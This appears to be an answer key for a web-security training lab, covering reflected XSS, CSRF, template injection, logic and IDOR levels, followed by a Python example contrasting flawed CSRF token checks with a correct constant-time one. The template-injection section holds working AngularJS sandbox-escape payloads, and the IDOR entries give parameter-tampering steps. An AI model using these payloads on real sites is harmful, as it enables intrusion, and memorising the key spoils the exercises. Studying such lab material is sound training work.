RXSS
---------
1: No filters
2: Filtering alert
3: Filtering alert, confirm and script

CSRF
---------
1: No token where it should be
2: Adds a token but never checks it
3: Only checks if the token is present but not correct
4: Only checks the length of the token

CSTI
---------
1: {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
2: {{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
3: {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}

LOGIC
---------
1: The mileage is calculated client-side; it should never be
2: You can enter a discount of more than 100%
3: The number of votes is controlled client-side

IDOR
---------
1: You need to add the parameter "?user_id=2" to the URL
2: You need to add the parameter "?post_id=2" to the URL
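The four CSRF levels listed above, each written as the token check a server would run, beside a correct check, as an added example that is not part of the original list; the function names, the audit helper and the session token value are constructed for illustration:

```python
import hmac

# Constructed example value: the token the server stored in the user's session.
SESSION_TOKEN = "constructed-session-token-1234"


def check_level1(submitted, expected):
    # Level 1: no token where there should be one; every request passes.
    return True


def check_level2(submitted, expected):
    # Level 2: a token is issued with the form but never compared.
    return True


def check_level3(submitted, expected):
    # Level 3: only presence is checked, so any non-empty string passes.
    return bool(submitted)


def check_level4(submitted, expected):
    # Level 4: only the length is checked, so any string of the right length passes.
    return submitted is not None and len(submitted) == len(expected)


def check_correct(submitted, expected):
    # Correct: require a token and compare it to the session value in constant time.
    if not submitted or not expected:
        return False
    return hmac.compare_digest(submitted, expected)


def audit(check, expected):
    """Run a check against three forged-request shapes and report which it rejects."""
    forged = {
        "missing": None,                  # request carries no token at all
        "garbage": "x",                   # any non-empty value
        "same_length": "0" * len(expected),  # right length, wrong value
    }
    return {name: not check(value, expected) for name, value in forged.items()}
```

Only `check_correct` rejects all three forged shapes; each level's check lets at least one through, which is what makes that level exploitable.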